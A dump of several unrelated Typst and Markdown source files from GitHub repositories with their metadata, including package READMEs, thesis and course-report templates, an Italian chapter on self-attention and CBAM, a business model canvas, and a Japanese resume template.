)[MaharaTech]]
= #smallcaps[Awards]
#chiline()
#strong[Certificate of Appreciation] \
Issued by Egyptian Natural Gas Company (GASCO) for Success in High School with a High Score |
|
https://github.com/schmidma/typst-workshop | https://raw.githubusercontent.com/schmidma/typst-workshop/main/examples/12-bibliography.typ | typst | Creative Commons Zero v1.0 Universal | This is a citation to a paper by @johnson2022ai. Followed by a work of <NAME> @smith2023modern.
#bibliography("literature.bib") |
https://github.com/data-niklas/typst_live | https://raw.githubusercontent.com/data-niklas/typst_live/main/README.md | markdown | MIT License | # Typst live
Create beautiful PDF's right in your browser using [Typst](https://typst.app). This project brings Typst into your browser using WASM.
## Features
- Create PDF's completely locally (after loading the page, no further internet connection is required, except to load further packages)
- Support for Typst packages (introduced in Typst 0.6.0)
- Toggle between automatic PDF creation and Ctrl-S
- Uncluttered UI providing the most space to write PDF's
- Store the document content in your URL, to easily share documents: [This README as a Typst document](https://typo.man.cy/?text=eNp9Uz1vGzEM3e9XEMlQB_BHpg4BPBQJDARIiqK20aHwoNPx7tjIkkpRdvzvS53tpDWKTBIl8fHx8ek69WEPjvzLHWTfIOsWqzmsDjGJnu-wumc0glCjyUJtdvDtYf<KEY>gMNYd9QoacyHdwXQBHV71ITHezmRSwqYnx6ubnALyZwqqn<KEY>_gf<KEY>sd<KEY>iia773SoeBByTH-zsTYj<KEY>is<KEY>xq43wLI8Xn0G<KEY>7_Ty9LYmr0HWuqCt7RA-qcdgaIVtaAlu6K3SMb-Be2E2WmrL21mVRzgq4fiwi7uitu21Q9KTFsfDdM53VKSQlMA6vmmDzFv3QspT1PMf196dxSUSTSOVLveH312lQ_2sQrB6CKig6mYKnYpW-neEOzzNNkLLtwSSoje3R6b0WTpQuRm8zs0JrrSaoWAU0<KEY>)
## Note
Do not use this for large projects such as a bachelor's thesis. This project currently does not support multiple files, such as a separate BibTeX bibliography.
## Libraries
- [Simple notify](https://github.com/simple-notify/simple-notify) under MIT for notifications
- [Split grid](https://github.com/nathancahill/split/) under MIT for the middle split pane
- Favicon by [Feathericons](https://github.com/feathericons/feather)
|
https://github.com/Jollywatt/typst-wordometer | https://raw.githubusercontent.com/Jollywatt/typst-wordometer/master/README.md | markdown | MIT License | # `wordometer`
[](docs/manual.pdf)

[](https://github.com/Jollywatt/typst-wordometer)
A small [Typst]("https://typst.app/") package for quick and easy in-document word counts.
## Basic usage
```typ
#import "@preview/wordometer:0.1.3": word-count, total-words
#show: word-count
In this document, there are #total-words words all up.
#word-count(total => [
The number of words in this block is #total.words
and there are #total.characters letters.
])
```
## Excluding elements
You can exclude elements by name (e.g., `"caption"`), function (e.g., `figure.caption`), where-selector (e.g., `raw.where(block: true)`), or label (e.g., `<no-wc>`).
```typ
#show: word-count.with(exclude: (heading.where(level: 1), strike))
= This Heading Doesn't Count
== But I do!
In this document #strike[(excluding me)], there are #total-words words all up.
#word-count(total => [
You can exclude elements by label, too.
#[That was #total.words, excluding this sentence!] <no-wc>
], exclude: <no-wc>)
```
|
https://github.com/xbunax/tongji-undergrad-thesis | https://raw.githubusercontent.com/xbunax/tongji-undergrad-thesis/main/init-files/sections/05_conclusion.typ | typst | MIT License | #import "../../tongji-undergrad-thesis/elements.typ": *
= 总结与未来工作展望
本节通常用于对论文进行总结和归纳,并提出未来工作的展望和建议。
在总结部分,需要回顾研究内容和方法,对研究结果进行分析和归纳,并阐述研究工作的贡献。同时,也要对研究过程中存在的问题和不足进行反思和总结,为未来的研究提供参考和启示。
在未来工作展望部分,需要具体提出研究计划和建议,为后续研究提供方向和指导。同时,也要对本文提出的方法和技术进行展望,探索其在未来研究中的应用前景和发展方向。此外,还可以指出当前领域中存在的未解决问题,为未来研究提供新的研究思路和方向。
此外,未来工作展望中还可以对本文研究的局限性进行讨论和说明,提出改进和扩展的方向。同时,也要注意将未来工作展望与本文研究内容相互关联,以确保研究的连续性和完整性。
最后,需要强调本文研究的意义和价值,并对读者进行总结和启示,为相关领域的研究提供借鉴和参考。在撰写总结与未来工作展望时,需要遵循逻辑清晰、表达准确、语言简练的原则,使得整篇论文的结论和建议具有可读性和可信度。 |
https://github.com/typst/templates | https://raw.githubusercontent.com/typst/templates/main/icicle/README.md | markdown | MIT No Attribution | # icicle
Help the Typst Guys reach the helicopter pad and save Christmas! Navigate them
with the WASD keys and solve puzzles with snowballs to make way for the Typst
Guys.
This small Christmas-themed game is playable in the Typst editor and best
enjoyed with the web app or `typst watch`. It was first released for the 24 Days
to Christmas campaign in winter of 2023.
## Usage
You can use this template in the Typst web app by clicking "Start from template"
on the dashboard and searching for `icicle`.
Alternatively, you can use the CLI to kick this project off using the command
```
typst init @preview/icicle
```
Typst will create a new directory with all the files needed to get you started.
## Configuration
This template exports the `game` function, which accepts a positional argument for the game input.
The template will initialize your package with a sample call to the `game`
function in a show rule. If you want to change an existing project to use this
template, you can add a show rule like this at the top of your file:
```typ
#import "@preview/icicle:0.1.0": game
#show: game
// Move with WASD.
```
You can also add your own levels by adding an array of level definition strings
in the `game` function's named `levels` argument. Each level file must conform
to the following format:
- First, a line with two comma-separated integers indicating the player's
starting position.
- Then, a matrix with the characters f (floor), x (wall), w (water), or g
(goal).
- Finally, a matrix with the characters b (snowball) or _ (nothing).
The three arguments must be separated by double newlines. Additionally, each
row in the matrices space-separates its values. Newlines terminate the rows.
Comments can be added with a double slash. Find an example for a valid level
string below:
```
// The starting position
0, 0
// The back layer
f f f w f f f
f f f w f f f
f f x w f f f
f f f w f f f
f f f w f x x
x x x g x x x
// The front layer.
_ _ b _ _ _ _
_ _ b _ _ _ _
_ _ _ _ b _ _
_ _ _ _ b _ _
_ _ _ _ _ _ _
_ _ _ _ _ _ _
```
It's best to put levels into separate files and load them with the `read`
function.
|
https://github.com/GYPpro/Java-coures-report | https://raw.githubusercontent.com/GYPpro/Java-coures-report/main/README.typ | typst | #set page(
paper:"a4",
)
#set text(
font:("Times New Roman","Source Han Serif SC"),
style:"normal",
weight: "regular",
size: 13pt,
)
#set text(font:("Times New Roman","Source Han Serif SC"))
#show raw.where(block: false): box.with(
fill: luma(240),
inset: (x: 3pt, y: 0pt),
outset: (y: 3pt),
radius: 2pt,
)
// Display block code in a larger block
// with more padding.
#show raw.where(block: true): block.with(
fill: luma(240),
inset: 10pt,
radius: 4pt,
)
#outline(
title: "Catalog"
);
#pagebreak()
= sis0:命令行编译
#pagebreak()
= sis1:基础IO操作
使用了Scanner实现了输入一个给定长度的差分数组,求出其原数组,即对数组进行逐项求和。
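差分数组还原的过程可以用下面的 Python 片段示意(课程实现为 Java,此处仅演示前缀和思路):

```python
def restore_from_diff(diff):
    # 对差分数组逐项累加(前缀和),即可还原原数组
    original, running = [], 0
    for d in diff:
        running += d
        original.append(running)
    return original

# 原数组 [3, 5, 4, 8] 的差分数组为 [3, 2, -1, 4]
print(restore_from_diff([3, 2, -1, 4]))  # → [3, 5, 4, 8]
```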
#pagebreak()
= sis2:UID管理器
提供三种类型的UID生成、申请与维护。
+ 基于日期的UID,例如2022101149
+ 完全无序的类激活码,例如AA2CA-STBS3-AED2P-RDGSSP
+ 按顺序发放的序列,可选固定位数,例如00001,00002
可以保证所有UID不会重复。
类中储存所有UID对应的引用。
申请复杂度O(1),引用复杂度O(log(n))
测试用例的控制台规则:\
中括号内为需要填入字符串\
尖括号为可选参数,默认为列表第一个
#figure(
table(
columns: 2,
align: left+horizon,
[```shell-unix-generic
getUID <type: "date" | "code" | "seq"> [name]
```],[申请对应类型的新UID,并与一个引用名称name绑定],
[```shell-unix-generic
secUID <type: "date" | "code" | "seq"> [UID]
```],[查找UID对应的引用名称]
)
)
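三类 UID 的生成逻辑可以用下面的 Python 草图示意(格式细节为假设,与课程中的 Java 实现无关;用集合记录已发放 UID 以保证不重复):

```python
import random
import string

class UIDManager:
    # 三类 UID 生成的极简示意;已发放的 UID 存入集合,保证不重复
    def __init__(self, seq_width=5):
        self.issued = set()
        self.seq_counter = 0
        self.date_counter = 0
        self.seq_width = seq_width

    def new_seq(self):
        # 按顺序发放、固定位数,如 00001、00002
        self.seq_counter += 1
        uid = str(self.seq_counter).zfill(self.seq_width)
        self.issued.add(uid)
        return uid

    def new_date(self, year=2022):
        # 基于日期的 UID,如 2022101149;此处用“年份 + 递增序号”简化
        self.date_counter += 1
        uid = f"{year}{self.date_counter:06d}"
        self.issued.add(uid)
        return uid

    def new_code(self, groups=4, width=5):
        # 完全无序的类激活码,如 AA2CA-STBS3-AED2P-RDGSS;撞码则重试
        alphabet = string.ascii_uppercase + string.digits
        while True:
            uid = "-".join(
                "".join(random.choices(alphabet, k=width)) for _ in range(groups)
            )
            if uid not in self.issued:
                self.issued.add(uid)
                return uid

m = UIDManager()
print(m.new_seq(), m.new_seq(), m.new_date())  # → 00001 00002 2022000001
```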
#pagebreak()
= sis3:实现一个trie(字典树)模板
#pagebreak()
= sis4:实现一个高性能的基础正则表达式匹配solution类
正则表达式
#pagebreak()
= sis5:学生信息管理器
提供了三个类,其中SchoolLib为主类,提供了对学生以下操作:
+ 添加学生并自动创建学号
+ 添加课程并自动生成课程编号
+ 学生选课
+ 记录考试成绩,补考成绩
+ 与平时分加权,计算总评成绩
+ 计算绩点
+ 以绩点、学号、姓名字典序等对学生排序
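加权总评与绩点的换算可以用如下 Python 片段示意(0.3/0.7 的权重与线性绩点映射均为假设值,实际规则以课程的 Java 实现为准):

```python
def total_score(normal, exam, normal_weight=0.3):
    # 平时分与考试分加权得到总评;权重 0.3/0.7 仅为示例假设
    return normal * normal_weight + exam * (1 - normal_weight)

def grade_point(score):
    # 假设的线性映射:60 分对应 1.0,每高 10 分加 1.0,封顶 4.0
    if score < 60:
        return 0.0
    return min(4.0, 1.0 + (score - 60) / 10)

s = total_score(80, 90)
print(round(s, 2), round(grade_point(s), 2))  # → 87.0 3.7
```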
保证所有操作线程安全,必要的地方进行了异常处理与保护性拷贝。
测试用例的控制台规则:\
中括号内为需要填入字符串\
尖括号为可选参数,默认为列表第一个
#set align(left)
#align(left+horizon)[
#figure(table(
columns: 2,
align: left+horizon,
[#align(left)[```shell-unix-generic
addStu [student name]
```]],[添加学生],
[#align(left)[```shell-unix-generic
addCur [Course name] [teacher name] [credit]
```]],[添加课程],
[#align(left)[```shell-unix-generic
celCur [student UID] [Course name]
```]],[选课],
[#align(left)[```shell-unix-generic
showStu <sort with:"UID" | "name" | "GPA">
```]],[显示学生列表],
[#align(left)[```shell-unix-generic
showCur <sort with:"UID" | "Course name" | " teacher name">
```]],[显示课程列表],
[#align(left)[```shell-unix-generic
addScore [student UID] [Course name] [Normally score] [Exam score]
```]],[添加成绩],
[#align(left)[```shell-unix-generic
addResc [student UID] [Course name] [Exam score]
```]],[添加补考成绩],
[#align(left)[```shell-unix-generic
cacu
```]],[计算总评成绩与绩点]
))
]
#pagebreak()
= sis6:实现一个线段树泛型模板
线段树是一种较为复杂的数据结构,旨在快速解决区间数据批量修改与特征统计。\
本类实现了一个可以批量地对数据进行线性空间内加和运算的线段树,统计内容为区间内的最大值,对于每个操作:
+ 修改单点:时间复杂度为$O(log n)$
+ 修改区间:均匀修改与查询后最坏时间复杂度为每点渐进$O(log (n m))$,n为内容总数,m为修改区间长度
+ 查询区间:$O(log n)$
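上述"区间加 / 区间最大值"线段树通常用懒标记实现。下面的 Python 草图仅作概念演示(并非原泛型模板):

```python
class SegTree:
    # 区间加 / 区间最大值线段树(懒标记), 仅为概念示意
    def __init__(self, data):
        self.n = len(data)
        self.mx = [0] * (4 * self.n)
        self.lazy = [0] * (4 * self.n)
        self._build(1, 0, self.n - 1, data)

    def _build(self, node, lo, hi, data):
        if lo == hi:
            self.mx[node] = data[lo]
            return
        mid = (lo + hi) // 2
        self._build(2 * node, lo, mid, data)
        self._build(2 * node + 1, mid + 1, hi, data)
        self.mx[node] = max(self.mx[2 * node], self.mx[2 * node + 1])

    def _push(self, node):
        # 将懒标记下放给两个子节点
        if self.lazy[node]:
            for c in (2 * node, 2 * node + 1):
                self.mx[c] += self.lazy[node]
                self.lazy[c] += self.lazy[node]
            self.lazy[node] = 0

    def add(self, l, r, v, node=1, lo=0, hi=None):
        # 区间 [l, r] 每个元素加 v
        if hi is None:
            hi = self.n - 1
        if r < lo or hi < l:
            return
        if l <= lo and hi <= r:
            self.mx[node] += v
            self.lazy[node] += v
            return
        self._push(node)
        mid = (lo + hi) // 2
        self.add(l, r, v, 2 * node, lo, mid)
        self.add(l, r, v, 2 * node + 1, mid + 1, hi)
        self.mx[node] = max(self.mx[2 * node], self.mx[2 * node + 1])

    def query(self, l, r, node=1, lo=0, hi=None):
        # 查询区间 [l, r] 的最大值
        if hi is None:
            hi = self.n - 1
        if r < lo or hi < l:
            return float("-inf")
        if l <= lo and hi <= r:
            return self.mx[node]
        self._push(node)
        mid = (lo + hi) // 2
        return max(self.query(l, r, 2 * node, lo, mid),
                   self.query(l, r, 2 * node + 1, mid + 1, hi))
```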
#pagebreak()
= sis7:实现对网络最大流与最小费用流问题的solution类
最大流问题叙述略
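最大流可以用 Edmonds-Karp 算法(在残量网络上反复做 BFS 增广)求解。下面的 Python 草图仅作概念演示(并非原 solution 类的实现):

```python
from collections import deque

def max_flow(capacity, source, sink):
    # Edmonds-Karp: capacity 为邻接矩阵, 反复 BFS 寻找增广路
    n = len(capacity)
    flow = [[0] * n for _ in range(n)]
    total = 0
    while True:
        parent = [-1] * n
        parent[source] = source
        q = deque([source])
        while q and parent[sink] == -1:
            u = q.popleft()
            for v in range(n):
                if parent[v] == -1 and capacity[u][v] - flow[u][v] > 0:
                    parent[v] = u
                    q.append(v)
        if parent[sink] == -1:   # 不存在增广路, 当前流即最大流
            return total
        # 找出增广路上的瓶颈容量
        bottleneck = float("inf")
        v = sink
        while v != source:
            u = parent[v]
            bottleneck = min(bottleneck, capacity[u][v] - flow[u][v])
            v = u
        # 沿增广路更新正向流与反向流
        v = sink
        while v != source:
            u = parent[v]
            flow[u][v] += bottleneck
            flow[v][u] -= bottleneck
            v = u
        total += bottleneck
```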
#pagebreak()
= sis8:实现一个瘟疫传播的可视化模拟
#pagebreak()
= sis9:实现一个较为复杂的线性代数计算器
#figure(
table(
align: left+horizon,
columns: 3,
[myLinearLib],[线性计算主类],
[myLinearEntire],[线性空间元素],
[
抽象类:具有线性性质的基础运算
],
[myLinearSpace],[线性空间],[
+ 基础运算
+ 基
+ 计算秩
+ 对应矩阵
],
[myMatrix],[矩阵],[
+ 基础运算
+ 求秩
+ 行列式
+ 逆
+ 转置
+ 对角化
],
[myPolynomial],[多项式],[
+ 基础运算
+ 求值
],
[myRealNum],[实数],[
+ 基础运算
]
)
)
实现的功能:控制台指令如下:
中括号内为需要填入字符串\
尖括号为可选参数,默认为列表第一个
#figure(
table(
align: left+horizon,
columns: 2,
[```shell-unix-generic
addMat [columns] [rows] [digit(1,1)] ... [digit(c,r)]
```],[添加一个列数为columns,行数为rows的矩阵],
[```shell-unix-generic
addPol [dim] [digit 1] ... [digit r]
```],[添加一个阶数为r的多项式],
[```shell-unix-generic
addLS [rank] [LE name 1] ... [LE name r]
```],[添加一个以`LE 1~r`为基的线性空间],
[```shell-unix-generic
show <scope :"all" | "Mat" | "Pol" | "LS">
```],[列出对应的所有元素],
[```shell-unix-generic
cacuMat [Mat name] <type :"Det" | "Rank" | "inverse" | "transpose" | "Eig">
```],[计算矩阵的行列式、秩、逆、转置和对角化],
[```shell-unix-generic
cacuPol [Pol name] [digit]
```],[计算多项式的值],
[```shell-unix-generic
op [LE name1] <operator :"+" | "-" | "*"> [LE name2]
```],[对线性空间元素进行基础运算]
)
)
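以行列式为例,矩阵功能之一可以用高斯消元(部分主元)实现。下面的 Python 草图仅作概念演示(并非 myMatrix 的原实现):

```python
def det(mat):
    # 高斯消元求行列式(部分主元), 仅为示意
    a = [row[:] for row in mat]
    n = len(a)
    sign = 1.0
    for i in range(n):
        # 选取当前列绝对值最大的行作为主元行
        p = max(range(i, n), key=lambda r: abs(a[r][i]))
        if abs(a[p][i]) < 1e-12:
            return 0.0           # 矩阵奇异, 行列式为 0
        if p != i:
            a[i], a[p] = a[p], a[i]
            sign = -sign         # 交换两行使行列式变号
        for r in range(i + 1, n):
            f = a[r][i] / a[i][i]
            for c in range(i, n):
                a[r][c] -= f * a[i][c]
    result = sign
    for i in range(n):
        result *= a[i][i]        # 上三角矩阵的行列式为对角元之积
    return result
```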
|
|
https://github.com/RiccardoTonioloDev/Bachelor-Thesis | https://raw.githubusercontent.com/RiccardoTonioloDev/Bachelor-Thesis/main/chapters/attention.typ | typst | Other | #pagebreak(to: "odd")
= _Attention_ <ch:attention>
Le reti neurali convoluzionali, sebbene funzionino particolarmente bene per essere addestrate su immagini e video, hanno un problema alla base, ovvero non sono in grado di considerare delle dipendenze a lungo raggio tra i vari _pixel_ o _patch_ del contenuto in analisi.
Alcune delle conseguenze che questo comporta sono:
- Un campo ricettivo limitato alla dimensione del @kernel;
- Il campo ricettivo cresce linearmente con la profondità della rete, e quindi potrebbero essere necessarie reti estremamente profonde, perché il modello riesca ad analizzare un contesto globale;
- I pesi dopo l'addestramento del modello rimangono fissi e non possono quindi adattarsi dinamicamente al contesto globale dell'immagine.
Tuttavia, negli anni precedenti una particolare tecnica (originariamente pensata per il @nlp) è emersa anche nel campo della _computer vision_, l'attenzione.
I meccanismi di attenzione cercano di captare dipendenze a lungo raggio al fine di migliorare, spesso significativamente, la qualità della predizione.
Il contenuto delle seguenti sezioni è riassumibile come segue:
- @sa:ch: descrive un potente ma computazionalmente costoso meccanismo di attenzione, il quale però permette miglioramenti significativi nelle predizioni, andando a trovare correlazioni tra ogni _pixel_ o _patch_ del contenuto analizzato;
- @cbam:ch: descrive un meccanismo di attenzione più leggero, creato apposta per essere utilizzato in reti a collo di bottiglia, cercando di estrarre informazioni significative, prima della riduzione di dimensionalità, analizzando prima la dimensione dei canali, e poi la dimensione spaziale (altezza e larghezza).
#block([
== _Self attention_ <sa:ch>
La _self attention_ è sostanzialmente un meccanismo originariamente creato per riuscire a trovare correlazioni tra le parole di una frase, di modo da assegnare dei pesi a ciascuna di esse per fornire una migliore predizione @aiayn.
],breakable: false,width: 100%)
Tuttavia nel lavoro discusso in @sa, viene descritta un'architettura che permette l'uso di principi simili, al fine di trovare correlazioni ad ampio raggio tra i vari _pixel_ dei contenuti analizzati.
Viene quindi enunciato il concetto di _operatore non locale_ ovvero il blocco presentato in @sa che calcola la risposta in una posizione come una media ponderata delle caratteristiche di tutte le posizioni dell'_input_.
#block([
L'architettura del _Non-local block_ è la seguente:
#figure(image("../images/architectures/Attention-sa.drawio.png",width: 300pt),caption: [Il _Non-local block_, presentato in @sa])
In questo caso "$times.circle$" rappresenta la moltiplicazione tra matrici.
],breakable: false,width: 100%)
#block([
Come in @aiayn, anche in questo blocco si identificano tre entità per riuscire ad ottenere l'attenzione:
- *Query* (Q): rappresenta la posizione per la quale stiamo calcolando l'_output_ non locale;
],breakable: false,width: 100%)
- *Key* (K): rappresenta le posizioni con cui la query viene confrontata per determinare la somiglianza;
- *Value* (V): rappresenta le informazioni che vengono aggregate per formare l'_output_ finale.
Si vuole far notare che in questo caso le tre matrici sono matrici della dimensione di $"numCanali" times ("altezza"dot"larghezza")$, questo per far sì che le moltiplicazioni matriciali combinino il valore di un _pixel_ con tutti gli altri.
La prima moltiplicazione tra matrici $Q dot K$ rappresenta il calcolo dell'affinità, ovvero calcolare i pesi di attenzione che determinano l'influenza di ogni _pixel_ (la colonna di $K$ presa in considerazione) sul _pixel_ in analisi (la riga di $Q$ presa in considerazione).
Successivamente le affinità calcolate vengono normalizzate tramite una funzione _softmax_ per ottenere i veri pesi di attenzione $A$.
Il prodotto matriciale $A dot V$ invece va a creare un'aggregazione ponderata delle informazioni, dando quindi luogo alla matrice di attenzione $Y$.
Questa viene poi moltiplicata per un peso apprendibile (equivalente ad applicare una convoluzione $1 times 1 times 1$), anche chiamato $gamma$, che serve per apprendere quanto applicare dell'attenzione calcolata.
Essendo in seguito fatta una somma tensoriale tra l'_input_ (anche detto _residual_, come menzionato in @resnet) e il risultato del calcolo dell'attenzione, il $gamma$ può anche partire da 0, andando quindi inizialmente a non applicare attenzione, questo per stabilizzare inizialmente il _training_ del modello.
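Il calcolo appena descritto può essere abbozzato in NumPy come segue (sketch puramente illustrativo: i pesi `w_q`, `w_k`, `w_v` e l'interfaccia sono ipotetici, non l'implementazione originale del blocco non locale):

```python
import numpy as np

def non_local_block(x, w_q, w_k, w_v, gamma):
    # x: (C, H*W); w_q, w_k, w_v: matrici (C, C), equivalenti a convoluzioni 1x1
    q = w_q @ x              # query  (C, N)
    k = w_k @ x              # key    (C, N)
    v = w_v @ x              # value  (C, N)
    affinity = q.T @ k       # (N, N): affinità fra ogni coppia di pixel
    # softmax riga per riga (normalizzazione numericamente stabile)
    a = np.exp(affinity - affinity.max(axis=-1, keepdims=True))
    a = a / a.sum(axis=-1, keepdims=True)
    y = v @ a.T              # aggregazione ponderata delle informazioni (C, N)
    return gamma * y + x     # connessione residua: con gamma = 0 l'output è l'input
```

Con `gamma = 0` il blocco restituisce esattamente l'_input_, coerentemente con la strategia di stabilizzazione del _training_ descritta sopra.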
#block([
== _Convolutional Block Attention Module_ <cbam:ch>
Il _Convolutional Block Attention Module_ (CBAM), presentato in @CBAM è un blocco fortemente basato sulle convoluzioni, che combina la _channel_ e la _spacial attention_, per migliorare le predizioni del modello.
],breakable: false,width: 100%)
#block([
Elementi di particolare interesse per questo modello sono:
    - La capacità di riuscire comunque, anche se non al livello della _self attention_, a catturare relazioni globali;
],breakable: false,width: 100%)
- Aumentare l'efficienza computazionale poiché aggiunge, rispetto ad altri meccanismi di attenzione, solo un discreto numero di parametri alla rete e nessuna moltiplicazione matriciale.
Il blocco CBAM è principalmente composto da due sotto-moduli, uno per calcolare l'attenzione sui canali, che una volta combinato mediante un @hadamard con il _residual_ dell'_input_, viene passato al modulo di attenzione spaziale.
L'_output_ di attenzione spaziale viene poi combinato con il _residual_ dell'_output_ del modulo di attenzione sui canali mediante un @hadamard, generando quindi l'_output_ con l'attenzione applicata.
#block([
L'architettura del blocco CBAM è quindi la seguente:
#figure(image("../images/architectures/Attention-CBAM.drawio.png",width: 300pt),caption: [Il _Convolutional Block Attention Module_, presentato in @CBAM])
],breakable: false,width: 100%)
Il modulo di attenzione sui canali, opera sulla spazialità del tensore (altezza e larghezza) mediante _pooling_ massimo e _pooling_ medio, andando quindi a creare due vettori, i quali rappresenteranno il valore massimo e la media di ciascun canale del tensore di _input_.
Successivamente entrambi questi vettori vengono passati attraverso un _multi layer perceptron_ da tre strati, con il primo e l'ultimo dalle medesime dimensioni dell'_input_, mentre quello centrale, essendo più piccolo, applica un fattore di compressione.
Entrambi i vettori risultanti vengono poi sommati tra loro e passati attraverso una sigmoide, la quale genererà il vettore di attenzione sui canali.
#block([
L'architettura è la seguente:
#figure(image("../images/architectures/Attention-CBAM-ca.drawio.png",width: 300pt),caption: [Il modulo di attenzione sui canali, presentato in @CBAM])
],breakable: false,width: 100%)
Il modulo di attenzione spaziale invece, opera sulla profondità del tensore (i canali) mediante _pooling_ massimo e _pooling_ medio, andando quindi a generare due matrici, le quali rappresenteranno i valori massimi e i valori medi sui canali, per ciascun elemento nelle coordinate dell'altezza e della larghezza.
Queste matrici vengono concatenate sulla dimensione dei canali e successivamente passate attraverso una convoluzione con @kernel di dimensione $3times 3$. Infine l'_output_ di questa operazione viene passato attraverso una sigmoide che genererà quindi la matrice di attenzione sulla spazialità.
#block([
Questa è quindi l'architettura:
#figure(image("../images/architectures/Attention-CBAM-sa.drawio.png",width: 300pt),caption: [Il modulo di attenzione sulla spazialità, presentato in @CBAM])
],breakable: false,width: 100%)
Come spesso viene fatto, in @CBAM viene anche citata la possibilità di aggiungere uno step dove all'attenzione calcolata viene poi sommato il _residual_ dell'_input_, al fine di stabilizzare l'apprendimento.
Questo lo rende particolarmente interessante per la famiglia delle reti convoluzionali ResNet @resnet, in quanto fortemente basata su questo meccanismo.
Si può quindi implementare un approccio ResNet, ponendo il blocco CBAM subito dopo una convoluzione, per poi sommare il suo _output_ all'_output_ della convoluzione iniziale.
#block([
L'architettura proposta è quindi la seguente:
#figure(image("../images/architectures/Attention-CBAM-resnet.drawio.png",width: 200pt),caption: [Applicazione del blocco CBAM con approccio _ResNet_])
],breakable: false,width: 100%)
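L'intero blocco CBAM può essere abbozzato in NumPy come segue (sketch puramente illustrativo: dimensioni, fattore di compressione e pesi sono ipotetici, non l'implementazione originale):

```python
import numpy as np

def sigmoid(z):
    return 1.0 / (1.0 + np.exp(-z))

def channel_attention(x, w1, w2):
    # x: (C, H, W); w1: (C//r, C), w2: (C, C//r) -- MLP condiviso (pesi ipotetici)
    avg = x.mean(axis=(1, 2))   # pooling medio sulla spazialità  -> (C,)
    mx = x.max(axis=(1, 2))     # pooling massimo sulla spazialità -> (C,)
    att = sigmoid(w2 @ np.maximum(w1 @ avg, 0) + w2 @ np.maximum(w1 @ mx, 0))
    return x * att[:, None, None]   # prodotto di Hadamard canale per canale

def conv2d_same(x2, w):
    # convoluzione naive su 2 canali, padding "same", stride 1
    _, H, W = x2.shape
    kh, kw = w.shape[1:]
    xp = np.pad(x2, ((0, 0), (kh // 2, kh // 2), (kw // 2, kw // 2)))
    out = np.zeros((H, W))
    for i in range(H):
        for j in range(W):
            out[i, j] = (xp[:, i:i + kh, j:j + kw] * w).sum()
    return out

def spatial_attention(x, w):
    # pooling medio e massimo lungo i canali, concatenati -> (2, H, W)
    pooled = np.stack([x.mean(axis=0), x.max(axis=0)])
    return x * sigmoid(conv2d_same(pooled, w))[None]

def cbam(x, w1, w2, w_sp):
    # prima attenzione sui canali, poi attenzione spaziale
    xc = channel_attention(x, w1, w2)
    return spatial_attention(xc, w_sp)
```

Poiché entrambe le mappe di attenzione passano per una sigmoide, ogni valore dell'_output_ ha modulo non superiore al corrispondente valore dell'_input_.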
|
https://github.com/lucannez64/Notes | https://raw.githubusercontent.com/lucannez64/Notes/master/Nvim.md | markdown | ## Plugins
- Lazy
- Catppuccin
- Typst
- Telescope
- Treesitter
- Lualine
- Mason
- nvim-cmp
- LuaSnip
|
|
https://github.com/Mc-Zen/zero | https://raw.githubusercontent.com/Mc-Zen/zero/main/src/impl.typ | typst | MIT License | // Access to implementation for third-party packages. Note: this API may be unstable.
#import "formatting.typ"
#import "parsing.typ"
#import "utility.typ"
#import "rounding.typ" |
https://github.com/fredguth/typst-business-model-canvas | https://raw.githubusercontent.com/fredguth/typst-business-model-canvas/main/biz_canvas.typ | typst | #import "@preview/tablex:0.0.5": tablex, rowspanx, colspanx, hlinex, cellx
#let canvas(
title:[],
business:[],
problems:[],
activities:[],
metrics:[],
proposition:[],
unfair:[],
channels:[],
clients:[],
costs:[] ,
revenues:[],
) = {
set page(
"a4",
flipped: true,
fill: rgb("f2e5dd"),
margin: (1em)
)
set text(font: "Arial")
pad(x:4em, top:6em, bottom: 4em)[
#place(dy:-5em, title)
#place(left, dy:-6em, dx: 15.5cm, box(
fill: luma(240),
radius: 1em,
width: 10.2cm,
height: 2cm,
inset: 1em,
business))
#tablex(
columns: (2fr, 2fr, 1fr, 1fr, 2fr, 2fr),
rows: (1fr, 1fr, 1fr),
inset: 1em,
rowspanx(2)[
#problems
],[
#activities
], cellx(colspan: 2, rowspan:2)[
#proposition
], [
#unfair
], rowspanx(2)[
#clients
],
(), [
#metrics
], (), [
#channels
],(),
cellx(colspan:3)[
#costs
], cellx(colspan:3)[
#revenues
]
)
]
} |
|
https://github.com/Nikudanngo/typst-ja-resume-template | https://raw.githubusercontent.com/Nikudanngo/typst-ja-resume-template/main/main.typ | typst | MIT License | #import "template.typ": *
#let title = [#text(tracking: 1em,size: 14pt,[履歴書])]
#let fontSerif = ("Noto Serif", "Noto Serif CJK JP")
#let fontSan = ("Noto Sans", "Noto Sans CJK JP")
#set text(font: fontSerif, size: systemFontSize)
#set page(paper: "jis-b5",margin: 1.5cm)
= #title
// 使い方の説明。
// "私"と"アドレス"など日本語名の関数の引数を変更してください。
#move( dy: -1cm,
stack(
align(bottom,
grid(
columns: (5fr,2fr),
私(
性読み: "りれきしょ",
名読み: "たろう",
性: "履歴書",
名: "太郎",
生年月日: "平成xx年xx月xx日",
年齢: 99
),
証明写真(写真: "image/testImage.png")
// 証明写真()
),
),
アドレス(
住所ふりがな1: "とうきょうとすみだくおしあげ",
住所1: "東京都墨田区押上1丁目1−2",
郵便番号1: "131-0045",
電話番号1: "123-4567-8901",
Email1: "<EMAIL>",
住所ふりがな2: "",
住所2: "https://github.com/Nikudanngo/typst-ja-resume-template",
郵便番号2: "",
電話番号2: "",
Email2: ""
),
linebreak(),
経歴(
mode: "学歴・職歴",
columns: 14,
grid(
gutter: 0.61cm,
学歴(),
学歴(
年: "平成1",
月: "10",
学歴: "俺、爆誕"
),
学歴(
年: "平成20",
月: "3",
学歴: "スクスク育つ"
),
学歴(
年: "平成30",
月: "4",
学歴: "宇宙大学ツヨツヨ学部エンジニア学科 入学"
),
学歴(
年: "令和1",
月: "8",
学歴: "大規模開発サークル設立 \u{2192} サークル崩壊"
),
linebreak(),
職歴(),
職歴(
年: "令和6",
月: "4",
職歴: "大手IT系メーカーベンチャー企業 就職"
),
以上()
)
),
),
)
#pagebreak()
#stack(
経歴(
mode: "学歴・職歴",
columns: 5,
hegithLength: 5cm,
linebreak(),
// grid(
// gutter: 0.61cm,
// 資格(
// 年: "平成1",
// 月: "10",
// 資格: "大学入学"
// ),
// )
),
linebreak(),
経歴(
mode: "資格",
columns: 7,
hegithLength: 6.6cm,
grid(
gutter: 0.61cm,
資格(
年: "平成1",
月: "12",
資格: "普通自動車免許 取得"
),
)
),
linebreak(),
志望動機(
[私がこの職に応募する理由は、]
),
linebreak(),
本人希望(
[私は〇〇がしたい]
),
place(
